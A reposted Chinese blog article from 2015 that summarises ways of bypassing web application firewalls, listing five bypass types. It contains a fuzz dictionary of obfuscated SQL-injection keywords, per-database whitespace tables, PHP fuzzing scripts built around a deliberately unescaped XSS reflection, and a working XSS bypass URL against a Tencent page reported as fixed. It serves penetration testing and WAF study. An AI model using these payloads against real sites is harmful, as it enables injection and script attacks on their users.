码迷,mamicode.com
首页 > 其他好文 > 详细

WAF绕过的一些总结和思考

时间:2015-04-28 13:27:05      阅读:190      评论:0      收藏:0      [点我收藏+]

标签:

WAF分类:

1.网络层类

2.最常见且容易部署的应用层类 (部署在APACHE之前,APACHE之后)

 

 

应用层WAF – 利用WAF自身缺陷和MYSQL语法特性并结合实际绕过:

WAF最常见检测方式:关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求,丢弃这个数据包,XSS代码同理。

 

常见的绕过类型:

类型1:

数据包 -> WAF(利用string存储请求参数,解码后检测)-> APACHE

C语言等利用string等储存结构存储请求,在解码时,%00会成为 NULL 从而截断接下去的请求内容

因此例如 ?id=1%00%20and%201=1 就成为了 ?id=1 从而绕过WAF检测

 

类型2:

数据包 -> WAF ->APACHE

绕过逻辑:

WAF对某些User-Agent特殊放行(如百度spider 的UA)

WAF对某些POST包特殊放行(文件上传包)

例子:《安全狗某版本bypass》(http://zone.wooyun.org/content/17331)

 

类型3:

数据包 -> WAF ->APACHE

利用mysql的语法特性和html代码的特殊书写方式、浏览器的渲染方式绕过。由于实际渗透测试过程中对WAF的实际检测逻辑并不清楚,所以利用fuzz是最好的方法,这也是WAF最常见的绕过方法。

FUZZ字典:

 

%a0union%a0 (WAF中正则表达式 \s 并不能匹配 %a0 但MYSQL视之为 空格)
%0aunion%0a
%0bunion%0b (WAF中正则表达式 \s \t 并不能识别匹配 %0b)
%09union%09
/**/union/**/
%0dunion%0d
/*%e4*/union/*%e4*/(UTF8中的半个中文 正则表达式中任意匹配符(.)不能匹配该内容)
`version`() (MYSQL语法特性 函数可以书写成 `函数名`())
/*!union*/
8E0union (MYSQL语法特性,检测为浮点数后语境结束,视为空格,下2同)
8.0union
\Nunion
.1union/*.1*/
...

MYSQL类的一个fuzz实例:《用htmlspecialchars()和htmlentities()处理字符串在数据库查询过程中真的安全吗?》(http://www.nohackair.net/167.shit)

 

XSS类的一个fuzz实例:

《Fuzz <img src=x [code]onerror=XSS>来检测 onerror 前可以无缝连接怎样的字符》

编写fuzzz.php 和 fuzz.php 代码如下

Fuzzz.php:

 

<html>
<?php
$urlhex=[‘0‘,‘1‘,‘2‘,‘3‘,‘4‘,‘5‘,‘6‘,‘7‘,‘8‘,‘9‘,‘a‘,‘b‘,‘c‘,‘d‘,‘e‘,‘f‘];
$i=0;
$ii=0;
for ($i=0; $i < 16 ; $i++) { 
for ($ii=0; $ii < 16; $ii++) { 
$hex = $urlhex[$i] . $urlhex[$ii];
$realhex = ‘%‘ .$urlhex[$i] . $urlhex[$ii];
echo "<iframe src=‘http://localhost/fuzz.php?c=".$realhex."&d=".$hex."‘‘></iframe>";

}
}
?>
</html>

Fuzz.php:

 

<?php
$code = $_GET[‘c‘];
$cc = $_GET[‘d‘];
?>
<html>
<img src=x <?php echo $code?>onerror="alert(‘<?php echo $cc?>‘)">
</html>

 

运行Fuzzz.php 进行自动fuzz,结果为:

0c,0d,2f,0a,20,09

 

 

同理可以fuzz出各种标签的其他位置可以插入的特殊字符。

 

附SQL语句空白符FUZZ结果 (http://zone.wooyun.org/content/15953)

SQLite3:0A,0D,0C,09,20
MySQL5:09,0A,0B,0C,0D,A0,20
PosgresSQL:0A,0D,0C,09,20
Oracle_11g:00,0A,0D,0C,09,20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

 

 

 

类型4:

数据包 -> WAF ->APACHE

这是WAF无法考虑到的…

多次恶意代码检测和处理 留下的隐患:

例子(已修复):

漏洞名称:crm2.qq.com XSS

提交时间:2015-03-30 13:39:31

“这个时候就遇到了你们的迷之waf,<script>果断501啊,崩溃了半小时,稍微fuzz了一下,发现%0a会无视掉,成功bypass waf”

最后构造的XSS为:

http://crm2.qq.com/page/portalpage/wpa.php?uin=40012345&f=5&ty=6666&ap=%23&debug=1&bt=\x3csc%0aript\x3eale%0art()

 

这里有一个tencent waf ,对XSS代码也有一定的防御检测,在get请求中出现 <script> , alert() , <svg> 等关键词时,触发waf,返回错误码501

但由于参数在经过waf检测后,通过php的 $_GET[] 函数取得,并继续进行关键词过滤,经过笔者的一番fuzz,发现它会匹配换行符 %0a 并丢弃后输出,因此在这个逻辑下:

<scri%0apt>aler%0at()

经过waf 时,通过了检测(并没有关键词),然后经过php的字符串处理后,依然输出了恶意代码。

 

类型5:

数据包 -> WAF ->APACHE

畸形HTTP包,

利用Apache对HTTP包的兼容性和WAF对畸形HTTP包的不兼容性绕过WAF

 

总结:

对于普遍的应用层WAF,fuzz是测试waf的较好的方法,利用MYSQL的一些语法特性和浏览器的一些渲染方式,构造出一份强大的fuzz字典,或许就可以绕过waf的关键词检测。

同时,WAF和php代码的连接灵活性也是很值得考虑的,例如类型4,多次对传入数据进行处理反而容易留下隐患。

 

WAF绕过的一些总结和思考

标签:

原文地址:http://www.cnblogs.com/jiancanxuepiao/p/4462634.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!